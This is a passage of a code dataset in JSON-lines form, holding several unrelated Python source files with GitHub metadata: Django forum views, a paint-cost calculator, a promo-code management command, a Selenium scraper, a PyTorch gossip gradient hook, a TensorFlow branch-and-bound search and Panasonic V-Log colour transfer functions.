NewPost(request):\n if request.user.is_authenticated:\n if request.method == \"GET\":\n context = {}\n\n try:\n topic_id = str(request.GET['topic_id'])\n\n context[\"topic_id\"] = topic_id\n except:\n raise django.http.Http404\n\n return render(request, '../templates/csgo/forum/new_post.html', context)\n elif request.method == \"POST\":\n try:\n topic_id = str(request.GET['topic_id'])\n\n text = request.POST.get(\"text\")\n user = request.user.username\n\n 
new_post = Posts(topic_id=topic_id, author=user, text=text)\n new_post.save()\n\n topic = ForumTopic.objects.get(id=topic_id)\n topic.last_update = datetime.today().date()\n topic.save()\n\n return redirect('/csgo/forum/topic/?topic_id='+ topic_id)\n except:\n raise django.http.Http404\n else:\n return redirect('/accounts/login/')\n\n\ndef NewTopic(request):\n if request.user.is_authenticated:\n if request.method == \"GET\":\n context = {}\n\n # try:\n #\n # except:\n # raise django.http.Http404\n\n return render(request, '../templates/csgo/forum/new_topic.html', context)\n elif request.method == \"POST\":\n try:\n text = request.POST.get(\"text\")\n name = request.POST.get(\"title\")\n theme = request.POST.get(\"themes\")\n user = request.user.username\n\n print(theme)\n\n new_topic = ForumTopic(author=user, description=text, name=name, subject=theme, views=1, last_update=datetime.today().date(), number_of_posts=0)\n new_topic.save()\n\n\n return redirect('/csgo/forum/')\n except:\n raise django.http.Http404\n else:\n return redirect('/accounts/login/')\n\n\ndef ThemesList(request):\n context = {}\n try:\n theme = str(request.GET['theme'])\n\n context = {\"themes\": [], \"theme\": theme}\n\n for i in ForumTopic.objects.filter(subject=theme):\n if len(i.description) <= 200:\n context['themes'].append(\n {\"id\": i.id, \"name\": i.name, \"description\": i.description, \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[\n :4],\n \"number_of_posts\": str(i.number_of_posts)})\n else:\n context['themes'].append(\n {\"id\": i.id, \"name\": i.name, \"description\": i.description[:201] + '...', \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[\n :4],\n \"number_of_posts\": str(i.number_of_posts)})\n\n return render(request, '../templates/csgo/forum/themes_list.html', context)\n except:\n raise django.http.Http404\n\n\ndef SearchTopic(request):\n text = request.GET.get(\"search\")\n\n results = ForumTopic.objects.filter(name__contains=text)\n results_themes = ForumTopic.objects.filter(subject__contains=text)\n\n search = str(request.GET['search'])\n\n context = {\"results\": [], \"results_themes\": [], \"search\": search}\n\n for i in results:\n if len(i.description) <= 200:\n context['results'].append(\n {\"id\": i.id, \"name\": i.name, \"description\": i.description, \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[\n :4],\n \"number_of_posts\": str(i.number_of_posts)})\n else:\n context['results'].append(\n {\"id\": i.id, \"name\": i.name, \"description\": i.description[:201] + '...', \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[\n :4],\n \"number_of_posts\": str(i.number_of_posts)})\n\n for i in results_themes:\n if len(i.description) <= 200:\n context['results_themes'].append(\n {\"id\": i.id, \"name\": i.name, \"description\": i.description, \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + str(i.last_update)[\n :4],\n \"number_of_posts\": str(i.number_of_posts)})\n else:\n context['results_themes'].append(\n {\"id\": i.id, \"name\": i.name, \"description\": i.description[:201] + '...', \"views\": str(i.views),\n \"last_update\": str(i.last_update)[-2:] + \".\" + str(i.last_update)[5:7] + \".\" + 
str(i.last_update)[\n                                                                            :4],\n                 \"number_of_posts\": str(i.number_of_posts)})\n\n    return render(request, '../templates/csgo/forum/topic_search.html', context)\n","repo_name":"ershovdan/mf-website-2021","sub_path":"csgo_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"11100596549","text":"'''\nWrite a program for a paint store. The program should ask for the size, in square meters, of the area to be painted.\nAssume that one liter of paint covers 6 square meters and that the paint is sold in 18-liter cans,\nwhich cost R$ 80.00, or in 3.6-liter gallons, which cost R$ 25.00.\nTell the user how much paint to buy and the respective prices in 3 situations:\nbuying only 18-liter cans;\nbuying only 3.6-liter gallons;\nmixing cans and gallons so that the price is the lowest. Add a 10% margin and always round the values up, that is, consider full cans.\n'''\n\nfrom math import ceil\ni = ('        ARCO-IRIS TINTAS          ')\nprint('{:/^150}'.format(i))\n\narea = float(input('What is the size of the area to be painted, in m²: '))\nquantidade_tinta = area / 6\nquantidade_lata = (quantidade_tinta / 18)\nquantidade_galao = (quantidade_tinta / 3.6)\n# round the division results up to the next whole value\nquantidade_tinta = ceil(quantidade_tinta)\nquantidade_lata = ceil(quantidade_lata)\nquantidade_galao = ceil(quantidade_galao)\n\ncusto1 = (quantidade_lata * 80.00)\ncusto2 = (quantidade_galao * 25.00)\nprint('=-'* 150)\nprint('you will use {} liters of paint'.format(quantidade_tinta))\n# options menu\nprint('''\n[1] buy only 18-liter cans at R$ 80.00 each\n[2] buy only 3.6-liter gallons at R$ 25.00 each\n[3] mix cans and gallons, where each can costs R$ 80.00 and each gallon R$ 25.00 ''')\nopcao = int(input('select an option: '))\nprint('-='*150)\nif opcao == 1:\n    print('You will need {} cans of paint, for a final price of {} reais '.format(quantidade_lata, custo1))\n\nelif opcao == 2:\n    print('You will need {} gallons of paint, for a final price of {} reais '.format(quantidade_galao, custo2))\n\nelif opcao == 3:\n    misto1 = quantidade_tinta // 18 # exact number of paint cans\n    misto2 = (quantidade_tinta % 18) / 3.6 # take the remainder of the division and split it to find how many gallons to use\n    misto2 = ceil(misto2)\n    custo3 = misto1 * 80.00\n    custo4 = misto2 * 25.00\n    custo_total = custo3 + custo4\n    print('You will use {} can(s) and {} gallon(s), for a final price of {} reais'.format(misto1, misto2, custo_total))\nelse:\n    print('Choose a valid option')\n","repo_name":"JoseJunior23/Iniciando-Python","sub_path":"treinando_pythonLista1/ex 017.py","file_name":"ex 017.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
{"seq_id":"3859678683","text":"from django.core.management.base import BaseCommand\n\nfrom promo_code.services import get_code_file_info\nfrom promo_code.apps import PromoCodeConfig\n\n\nclass Command(BaseCommand):\n    help = \"Prints the number of groups and codes in the file.\"\n\n    def add_arguments(self, parser):\n        parser.add_argument(\"-p\",\n                            \"--path\",\n                            type=str,\n                            default=PromoCodeConfig.promo_codes_file_path,\n                            help=\"Path to the file with the codes\")\n\n\n    def handle(self, *args, **kwargs):\n        path = kwargs[\"path\"]\n\n        if path is None or path == \"\":\n            
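# An empty or missing -p value leaves nothing to inspect, so print a\n            # usage hint and stop before touching the filesystem.\n            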
self.stdout.write(\"Укажите путь: -p <путь к файлу>\")\n return\n try:\n info = get_code_file_info(path)\n except FileNotFoundError:\n self.stdout.write(\"Файл не найден\")\n self.stdout.write(\"Проверьте путь к файлу\")\n return\n except ValueError:\n self.stdout.write(\"Не получается получить данные из файла\")\n self.stdout.write(\"Проверьте содержимое файла\")\n return\n except AssertionError:\n self.stdout.write(\"Неверно указаны параметры команды\")\n return\n \n if info is None: \n self.stdout.write(\"Не удалось получить данные о файле\")\n self.stdout.write(\"Проверьте содержимое\")\n return\n self.stdout.write(f\"В файле {info['groups']} групп, {info['codes']} промо кодов\")\n ","repo_name":"e-gulakhmet/PromoCodeAdmin","sub_path":"app/promo_code/management/commands/get_file_info.py","file_name":"get_file_info.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"40387764506","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.selector import Selector\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom shutil import which\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n\nclass ProductsSpider(scrapy.Spider):\n name = 'products'\n allowed_domains = ['data.afca.org.au']\n start_urls = ['https://data.afca.org.au/banking-and-finance']\n\n \n def __init__(self):\n #chrome_options = Options()\n #chrome_options.add_argument(\"--headless\")\n chrome_path = which(\"chromedriver\")\n driver = webdriver.Chrome(executable_path=chrome_path) #, options = chrome_options)\n driver.set_window_size(1920,1080)\n driver.get('https://data.afca.org.au/banking-and-finance')\n try:\n WebDriverWait(driver,100).until(EC.presence_of_element_located((By.CLASS_NAME, \"tableExContainer\")))\n self.html = driver.page_source\n ##need to work out where to click to get started on the looping!\n finally:\n driver.quit()\n \n def parse(self, response):\n resp = Selector(text=self.html)\n for MyElements in resp.xpath(\"//div[@class='tableEx']\"):\n yield {\n 'thing':(MyElements)\n }\n","repo_name":"arrghh1/afcaScraper","sub_path":"afca/spiders/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"33544130125","text":"from eros_core import Eros, TransportStates\n\nCOLOR_RED = \"\\033[91m\"\nCOLOR_GREEN = \"\\033[92m\"\nCOLOR_YELLOW = \"\\033[93m\"\nCOLOR_RESET = \"\\033[0m\"\n\nclass TransportStatusHandler():\n def __init__(self, eros):\n eros: Eros \n eros.transport_handle.attach_status_change_callback(self.status_change_callback)\n \n \n def status_change_callback(self, state):\n if (state == TransportStates.CONNECTING):\n print(f\"{COLOR_YELLOW}Connection lost, reconnecting...{COLOR_RESET}\")\n if (state == TransportStates.CONNECTED):\n print(f\"{COLOR_GREEN}Connection established{COLOR_RESET}\")\n if (state == TransportStates.DEAD):\n print(f\"{COLOR_RED}Connection lost{COLOR_RESET}\")","repo_name":"Florioo/eros-cli-python","sub_path":"src/eros_cli/app/utils/transport_status_log.py","file_name":"transport_status_log.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71343696911","text":"import math\nimport 
random\nfrom enum import Enum, auto\nfrom itertools import cycle\n\nimport torch\nimport torch.distributed as dist\nfrom torch._C._distributed_c10d import ProcessGroup\nfrom torch.distributed.algorithms._comm_hooks import default\nfrom torch.distributed.fsdp import FullyShardedDataParallel as FSDP\n\n# Setting a constant for situations when the communication peer\n# is not present in the current environment. This may happen in the CUBE topology,\n# when the number of nodes is not a power of 2. In this case, both\n# send and receive peers are equal to INVALID_PEER and no communication is\n# performed.\nINVALID_PEER = -1\n\n\nclass Topology(Enum):\n    r\"\"\"\n    Specifies which topology will be used as a base for gradient communication.\n    For more information, please refer to the original\n    `paper <https://arxiv.org/abs/1803.05880>`_\n\n    CUBE:\n        A hypercube topology - a hierarchical virtual organization of compute nodes.\n        For this topology gossiping is happening with a neighboring vertex.\n\n        >>> *----*\n        >>> /|   /|\n        >>> *----* |\n        >>> | * -|-*\n        >>> |/   |/\n        >>> *----*\n\n    DISSEMINATION:\n        A dissemination topology has a similar property\n        to the hypercube virtual topology.\n        For this topology gossiping is happening with the neighboring node,\n        then every 2nd node, every 4th, etc.\n\n        >>> .  *  .\n        >>> *     *\n        >>> .     .\n        >>> *     *\n        >>> .     .\n        >>> *     *\n        >>> .  *  .\n\n    .. note::\n        Current implementation does not support uneven number of nodes for a CUBE\n        topology.\n\n    \"\"\"\n    CUBE = auto()\n    DISSEMINATION = auto()\n\n\nclass GossipGraDState(default.DefaultState):\n    r\"\"\"\n    Stores state needed to perform GossipGraD algorithm within a communication hook.\n\n    .. note:: Note that this hook should be used with the NCCL PG backend and users\n        must set the current GPU device with `torch.cuda.set_device` prior to\n        ``GossipGraDState`` initialization, otherwise it will lead to\n        unexpected hang issues during the gossiping stage.\n\n    Args:\n        num_modules (int): Number of FSDP modules to identify how many communication\n            calls will be performed during a backpropagation pass.\n        topology (Topology): A virtual topology to be used for gradient communication.\n            (default: DISSEMINATION)\n        local_process_group (ProcessGroup): Stores local subgroup,\n            where intra-node communication will happen,\n            by default a subgroup is initialized to workers, belonging to the same node.\n            Should be provided together with `num_nodes`. When every local process group\n            contains only one worker, then this worker is considered to be a separate\n            node and local ``all_reduce`` and ``broadcast`` are not performed.\n            (default: None)\n        num_nodes (int): Number of nodes in a compute environment.\n            Should be provided together with `local_process_group`.\n            By default is initialized to the number of generated local subgroups.\n            (default: None)\n        master_process_group (ProcessGroup): Stores main workers,\n            which are involved in inter-node communication. By default, will be\n            composed from the workers with rank 0 in the local process group.\n            (default: None)\n        proc_per_node (int): Number of workers in each node. 
By default is initialized\n            to the size of a local subgroup.\n            (default: None)\n        random_seed (int): A random seed, so that randomly generated topologies\n            are the same on every worker.\n            (default: 2403)\n\n    \"\"\"\n\n    def __init__(\n        self,\n        num_modules,\n        topology=None,\n        local_process_group=None,\n        num_nodes=None,\n        master_process_group=None,\n        proc_per_node=None,\n        random_seed=2403,\n    ):\n        if num_modules is None or num_modules < 1:\n            raise ValueError(\"`num_modules` should be a positive integer.\")\n        self.num_modules = num_modules\n        self.topology = topology or Topology.DISSEMINATION\n        if local_process_group is None and num_nodes is None:\n            self.local_process_group, subgroups = dist.new_subgroups()\n            self.num_nodes = len(subgroups)\n        else:\n            if (\n                local_process_group is not None\n                and num_nodes is None\n                or local_process_group is None\n                and num_nodes is not None\n            ):\n                raise ValueError(\n                    \"`local_process_group` and `num_nodes` should be provided together.\"\n                )\n            self.local_process_group = local_process_group\n            if num_nodes < 1:\n                raise ValueError(\"`num_nodes` should be equal to 1 or more.\")\n            self.num_nodes = num_nodes\n\n        if self.num_nodes % 2 != 0 and self.topology == Topology.CUBE:\n            raise ValueError(\n                \"Current implementation doesn't support uneven number\"\n                \" of nodes for CUBE topology.\"\n            )\n\n        super().__init__(self.local_process_group)\n        self.proc_per_node = (\n            proc_per_node\n            if proc_per_node is not None\n            else self.local_process_group.size()\n        )\n        if self.proc_per_node < 1:\n            raise ValueError(\"`proc_per_node` should be equal to 1 or more.\")\n\n        self.master_process_group = (\n            master_process_group\n            if master_process_group is not None\n            else self._create_master_group()\n        )\n\n        self.random_seed = random_seed\n        self.topologies = self._generate_topologies(self.random_seed)\n        self.cur_topology = next(self.topologies)\n\n        # For `num_nodes` != power of 2 `gossip_period` should still be an int.\n        # If we only have 1 node, `gossip_period` should be equal to 1.\n        self.gossip_period = max(1, math.ceil(math.log(self.num_nodes, 2)))\n        self.iter = 0\n\n        # Get rank for current device\n        self.rank = dist.get_rank()\n\n        # Master worker for a current local `process_group`\n        self.master_worker = dist.distributed_c10d._get_global_rank(\n            self.local_process_group, 0\n        )\n\n    def _create_master_group(self):\n        r\"\"\"\n        Creates master process group, i.e. a group of workers,\n        which communicate gradients between different nodes.\n        \"\"\"\n        # Every 0th worker on every node will be assigned to a master group,\n        # i.e. if the number of processes per node is 8, the master group contains\n        # 0th, 8th, 16th, 24th, 32nd, ... ranks\n        ranks = [i * self.proc_per_node for i in range(self.num_nodes)]\n        return dist.new_group(ranks)\n\n    def _generate_topologies(self, random_seed):\n        r\"\"\"\n        Creates `num_nodes` random topology shuffles and returns an infinite iterator.\n        Original topology is of the form:\n        [0*K, 1*K, ... 
, N*K],\n where N is the number of nodes and K - the number of workers on each node.\n For example, with N=4 and K=8, original topology is\n [0, 8, 16, 24]\n\n Workers' rank values are used instead of node values for easier peer assignment\n in a collective communication stage.\n\n Returns:\n An infinite iterator over created topologies\n \"\"\"\n random.seed(random_seed)\n topologies_set = []\n original_list = [i * self.proc_per_node for i in range(self.num_nodes)]\n for _ in range(self.num_nodes):\n random.shuffle(original_list)\n topologies_set.append(original_list.copy())\n\n return cycle(topologies_set)\n\n\ndef _get_send_recv_peers(state):\n r\"\"\"\n Computes peers for the collective communication stage.\n For a ``CUBE`` topology a node sends grads to and receives from\n the same neighboring vertex. A pick for a neighboring vertex\n depends on the step number and current virtual topology in use.\n\n For a ``DISSEMINATION`` topology a node typically sends grads\n to and receives from different neighbors, but there may be a step\n where send and receive peers are the same node. A pick for send and receive peers\n depends on the step number and current virtual topology in use.\n\n For more information, please refer to the original\n `paper `_\n\n Args:\n state (GossipGradState): State for GossipGraD communication hook.\n\n Returns:\n Peers' global ranks to whom a current node sends gradients\n and from whom it is received.\n \"\"\"\n assert state.gossip_period > 0, \"`gossip_period` should be greater than 0.\"\n power = (state.iter // state.num_modules) % state.gossip_period\n # Our new node_rank is a position of a global rank in\n # a virtual topology\n node_rank = state.cur_topology.index(state.rank)\n\n if state.topology == Topology.CUBE:\n peer_idx = node_rank ^ 2**power\n if peer_idx >= len(state.cur_topology):\n return INVALID_PEER, INVALID_PEER\n return state.cur_topology[peer_idx], state.cur_topology[peer_idx]\n\n elif state.topology == Topology.DISSEMINATION:\n send_peer_idx = (node_rank + 2**power) % state.num_nodes\n recv_peer_idx = (node_rank - 2**power + state.num_nodes) % state.num_nodes\n return state.cur_topology[send_peer_idx], state.cur_topology[recv_peer_idx]\n\n\ndef _gossip(state, grad, scaling_factor=0.5):\n r\"\"\"\n Gossiping stage.\n\n At this step, it obtains communication peers,\n stacks ``torch.distributed.irecv`` and ``torch.distributed.isend`` operations,\n and performs communication with ``torch.distributed.batch_isend_irecv``.\n Finally, received and current gradients are added together\n and scaled appropriately, i.e. 
since communication happens\n    only between 2 peers at a time, summed gradients are divided\n    by 2 (or multiplied by 0.5)\n\n    For more information, please refer to the original\n    `paper <https://arxiv.org/abs/1803.05880>`_\n\n    Args:\n        state (GossipGradState): State for GossipGraD communication hook.\n        grad (torch.Tensor): A gradient for the local batch\n            that needs to be communicated across ranks.\n        scaling_factor (float): Scaling factor to apply after\n            received and current gradients are combined.\n\n    \"\"\"\n    send_peer, recv_peer = _get_send_recv_peers(state)\n\n    if send_peer == INVALID_PEER or recv_peer == INVALID_PEER:\n        return\n\n    assert send_peer is not None and recv_peer is not None, (\n        \"Failed to calculate send and receive peers: \"\n        f\"(`send_peer` is {send_peer} and `recv_peer` is {recv_peer})\"\n    )\n    # Need to check that send and receive peers are not equal to a current rank\n    assert send_peer != state.rank and recv_peer != state.rank, (\n        \"Expected send and receive peers to differ from a current rank: \"\n        f\"(current rank is {state.rank}, `send_peer` is {send_peer}\\\n        and `recv_peer` is {recv_peer})\"\n    )\n    assert (\n        send_peer != -1 and recv_peer != -1\n    ), \"Communication peers are not present in a current topology\"\n    recv_grad = torch.empty_like(grad)\n    ops = []\n\n    # For ranks not in the `master_process_group`,\n    # `master_process_group` is an `object` instance\n    assert isinstance(\n        state.master_process_group, ProcessGroup\n    ), \"`master_process_group` is not an instance of `ProcessGroup`\"\n\n    ops.append(\n        dist.P2POp(\n            op=dist.isend, tensor=grad, peer=send_peer, group=state.master_process_group\n        )\n    )\n    ops.append(\n        dist.P2POp(\n            op=dist.irecv,\n            tensor=recv_grad,\n            peer=recv_peer,\n            group=state.master_process_group,\n        )\n    )\n    reqs = dist.batch_isend_irecv(ops)\n    for req in reqs:\n        req.wait()\n    grad.add_(recv_grad).mul_(scaling_factor)\n\n\ndef get_num_modules(module: torch.nn.Module):\n    r\"\"\"\n    Returns number of FSDP modules in a provided FSDP instance.\n\n    Args:\n        module (torch.nn.Module): FSDP instance\n\n    Returns:\n        int: number of FSDP modules that are nested in the input ``module``,\n        including self.\n\n    \"\"\"\n    return len(FSDP.fsdp_modules(module))\n\n\ndef gossip_grad_hook(state: GossipGraDState, grad: torch.Tensor):\n    r\"\"\"\n    Communication hook, that follows\n    `GossipGraD <https://arxiv.org/abs/1803.05880>`_ strategy.\n\n    Every ``state.gossip_period`` step a virtual topology is changed.\n    Before an inter-node communication happens, gradients are reduced locally,\n    i.e. 
in an intra-node fashion.\n\n Only workers from a master process group are participating in a gossiping stage.\n Finally, every main worker broadcasts final gradient to its local subgroup\n\n Args:\n state (GossipGradState): State for GossipGraD communication hook.\n grad (torch.Tensor): A gradient for the local batch\n that needs to be communicated across ranks.\n\n Here is an example for how to initialize a default ``GossipGraD state``\n and register an fsdp model with a communication hook.\n ::\n\n >>> import torch\n >>> import torch.distributed as dist\n >>> from torch.distributed.fsdp import(\n >>> FullyShardedDataParallel as FSDP\n >>> )\n >>> from torchdistx.gossip_grad import(\n >>> GossipGraDState,\n >>> Topology,\n >>> get_num_modules,\n >>> gossip_grad_hook\n >>> )\n >>>\n >>> net = torch.nn.Linear(4, 10)\n >>> fsdp_net = FSDP(net)\n >>> state = GossipGraDState(num_modules=get_num_modules(fsdp_net))\n >>> fsdp_net.register_comm_hook(state, gossip_grad_hook)\n\n \"\"\"\n # Virtual topology changes every `state.gossip_period` step.\n # FSDP net can consist of multiple FSDP modules and every module will\n # increase `state.iter` during the backward pass. As a result, we need\n # to adjust for this behavior and make sure that virtual topology doesn't\n # change in the middle of the backward pass.\n if (state.iter // state.num_modules) % state.gossip_period == 0:\n state.cur_topology = next(state.topologies)\n\n # Reduce local gradients\n default.allreduce_hook(state, grad)\n # Perform gossiping step between master nodes (via master workers)\n if not dist._rank_not_in_group(state.master_process_group):\n _gossip(state, grad)\n # Broadcast received gradients in the local process group\n dist.broadcast(grad, src=state.master_worker, group=state.local_process_group)\n\n state.iter += 1\n","repo_name":"pytorch/torchdistx","sub_path":"src/python/torchdistx/gossip_grad.py","file_name":"gossip_grad.py","file_ext":"py","file_size_in_byte":14728,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"83"} +{"seq_id":"29205730240","text":"import tensorflow as tf\n\nimport model\nimport node\n\nCAPACITY = 100000\n\ndef value_to_priority(spca, value, tag):\n # The upper bound value \n max_priority = tf.cast(1 << 24, tf.float32)\n priority_value = tf.cast((1. 
- value / spca.frobenius_norm) * max_priority, tf.int64)\n return tf.bitwise.left_shift(priority_value, 32) + tf.cast(tag, tf.int64)\n\ndef extract_tag(priority_value):\n return tf.cast(priority_value & 0xFFFFFFFF, tf.int32)\n\ndef new_search_queue(spca):\n root_node_y, root_node_branch_var = node.build_root(spca)\n queue = tf.queue.PriorityQueue(\n CAPACITY,\n [tf.int32],\n [tf.TensorShape([spca.n])],\n )\n queue.enqueue([value_to_priority(spca, 0., root_node_branch_var), root_node_y])\n return queue\n\n@tf.function\ndef step(spca, queue, best_obj, best_y):\n if queue.size() < CAPACITY:\n priority_val, node_y = queue.dequeue()\n branch_node = extract_tag(priority_val)\n node_1, bounds_1, proj_1, node_2, bounds_2, proj_2, node_best, node_best_bound = node.process_node(spca, node_y, branch_node)\n # Non-terminal node to be added to the queue.\n if bounds_1[1] > best_obj and bounds_1[0] != bounds_1[1]:\n queue.enqueue([value_to_priority(spca, bounds_1[1], proj_1), node_1])\n if bounds_2[1] > best_obj and bounds_2[0] != bounds_2[1]:\n queue.enqueue([value_to_priority(spca, bounds_2[1], proj_2), node_2])\n if node_best_bound > best_obj:\n return node_best_bound, node_best\n else:\n return best_obj, best_y\n else:\n return best_obj, best_y\n","repo_name":"ringw/l0pca","sub_path":"l0pca/branchbound/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71025795471","text":"\"\"\"\nPanasonic V-Log Log Encoding\n============================\n\nDefines the *Panasonic V-Log* log encoding:\n\n- :func:`colour.models.log_encoding_VLog`\n- :func:`colour.models.log_decoding_VLog`\n\nReferences\n----------\n- :cite:`Panasonic2014a` : Panasonic. (2014). 
VARICAM V-Log/V-Gamut (pp.\n    1-7).\n    http://pro-av.panasonic.net/en/varicam/common/pdf/VARICAM_V-Log_V-Gamut.pdf\n\"\"\"\n\nfrom __future__ import annotations\n\nimport numpy as np\n\nfrom colour.hints import ArrayLike, NDArrayFloat\nfrom colour.models.rgb.transfer_functions import full_to_legal, legal_to_full\nfrom colour.utilities import Structure, as_float, from_range_1, to_domain_1\n\n__author__ = \"Colour Developers\"\n__copyright__ = \"Copyright 2013 Colour Developers\"\n__license__ = \"BSD-3-Clause - https://opensource.org/licenses/BSD-3-Clause\"\n__maintainer__ = \"Colour Developers\"\n__email__ = \"colour-developers@colour-science.org\"\n__status__ = \"Production\"\n\n__all__ = [\n    \"CONSTANTS_VLOG\",\n    \"log_encoding_VLog\",\n    \"log_decoding_VLog\",\n]\n\nCONSTANTS_VLOG: Structure = Structure(\n    cut1=0.01, cut2=0.181, b=0.00873, c=0.241514, d=0.598206\n)\n\"\"\"*Panasonic V-Log* constants.\"\"\"\n\n\ndef log_encoding_VLog(\n    L_in: ArrayLike,\n    bit_depth: int = 10,\n    out_normalised_code_value: bool = True,\n    in_reflection: bool = True,\n    constants: Structure = CONSTANTS_VLOG,\n) -> NDArrayFloat:\n    \"\"\"\n    Define the *Panasonic V-Log* log encoding curve / opto-electronic transfer\n    function.\n\n    Parameters\n    ----------\n    L_in\n        Linear reflection data :math:`L_{in}`.\n    bit_depth\n        Bit-depth used for conversion.\n    out_normalised_code_value\n        Whether the non-linear *Panasonic V-Log* data :math:`V_{out}` is\n        encoded as normalised code values.\n    in_reflection\n        Whether the light level :math:`L_{in}` to a camera is reflection.\n    constants\n        *Panasonic V-Log* constants.\n\n    Returns\n    -------\n    :class:`numpy.ndarray`\n        Non-linear data :math:`V_{out}`.\n\n    Notes\n    -----\n    +------------+-----------------------+---------------+\n    | **Domain** | **Scale - Reference** | **Scale - 1** |\n    +============+=======================+===============+\n    | ``L_in``   | [0, 1]                | [0, 1]        |\n    +------------+-----------------------+---------------+\n\n    +------------+-----------------------+---------------+\n    | **Range**  | **Scale - Reference** | **Scale - 1** |\n    +============+=======================+===============+\n    | ``V_out``  | [0, 1]                | [0, 1]        |\n    +------------+-----------------------+---------------+\n\n    References\n    ----------\n    :cite:`Panasonic2014a`\n\n    Examples\n    --------\n    >>> log_encoding_VLog(0.18)  # doctest: +ELLIPSIS\n    0.4233114...\n\n    The values of *Fig.2.2 V-Log Code Value* table in :cite:`Panasonic2014a`\n    are obtained as follows:\n\n    >>> L_in = np.array([0, 18, 90]) / 100\n    >>> np.around(log_encoding_VLog(L_in, 10, False) * 100).astype(np.int_)\n    array([ 7, 42, 61])\n    >>> np.around(log_encoding_VLog(L_in) * (2**10 - 1)).astype(np.int_)\n    array([128, 433, 602])\n    >>> np.around(log_encoding_VLog(L_in) * (2**12 - 1)).astype(np.int_)\n    array([ 512, 1733, 2409])\n\n    Note that some values in the last column of the\n    *Fig.2.2 V-Log Code Value* table in :cite:`Panasonic2014a` are different\n    by a code: [512, 1732, 2408].\n    \"\"\"\n\n    L_in = to_domain_1(L_in)\n\n    if not in_reflection:\n        L_in = L_in * 0.9\n\n    cut1 = constants.cut1\n    b = constants.b\n    c = constants.c\n    d = constants.d\n\n    V_out = np.where(\n        L_in < cut1,\n        5.6 * L_in + 0.125,\n        c * np.log10(L_in + b) + d,\n    )\n\n    V_out_cv = (\n        V_out if out_normalised_code_value else legal_to_full(V_out, bit_depth)\n    )\n\n    return as_float(from_range_1(V_out_cv))\n\n\ndef log_decoding_VLog(\n    V_out: ArrayLike,\n    bit_depth: int = 10,\n    in_normalised_code_value: bool = True,\n    out_reflection: bool = True,\n    constants: Structure = CONSTANTS_VLOG,\n) -> NDArrayFloat:\n    \"\"\"\n    Define the *Panasonic V-Log* log decoding curve / electro-optical transfer\n    function.\n\n    Parameters\n    ----------\n    V_out\n        Non-linear data :math:`V_{out}`.\n    bit_depth\n        Bit-depth used for conversion.\n    in_normalised_code_value\n        Whether the non-linear *Panasonic V-Log* data :math:`V_{out}` is\n        encoded as normalised code values.\n    out_reflection\n        Whether the light level :math:`L_{in}` to a camera is reflection.\n    constants\n        *Panasonic V-Log* constants.\n\n    Returns\n    -------\n    :class:`numpy.ndarray`\n        Linear reflection data :math:`L_{in}`.\n\n    Notes\n    -----\n    +------------+-----------------------+---------------+\n    | **Domain** | **Scale - Reference** | **Scale - 1** |\n    +============+=======================+===============+\n    | ``V_out``  | [0, 1]                | [0, 1]        |\n    +------------+-----------------------+---------------+\n\n    +------------+-----------------------+---------------+\n    | **Range**  | **Scale - Reference** | **Scale - 1** |\n    +============+=======================+===============+\n    | ``L_in``   | [0, 1]                | [0, 1]        |\n    +------------+-----------------------+---------------+\n\n    References\n    ----------\n    :cite:`Panasonic2014a`\n\n    Examples\n    --------\n    >>> log_decoding_VLog(0.423311448760136)  # doctest: +ELLIPSIS\n    0.1799999...\n    \"\"\"\n\n    V_out = to_domain_1(V_out)\n\n    V_out = (\n        V_out if in_normalised_code_value else full_to_legal(V_out, bit_depth)\n    )\n\n    cut2 = constants.cut2\n    b = constants.b\n    c = constants.c\n    d = constants.d\n\n    L_in = np.where(\n        V_out < cut2,\n        (V_out - 0.125) / 5.6,\n        10 ** ((V_out - d) / c) - b,\n    )\n\n    if not out_reflection:\n        L_in = L_in / 0.9\n\n    return as_float(from_range_1(L_in))\n","repo_name":"colour-science/colour","sub_path":"colour/models/rgb/transfer_functions/panasonic_v_log.py","file_name":"panasonic_v_log.py","file_ext":"py","file_size_in_byte":5861,"program_lang":"python","lang":"en","doc_type":"code","stars":1843,"dataset":"github-code","pt":"83"}
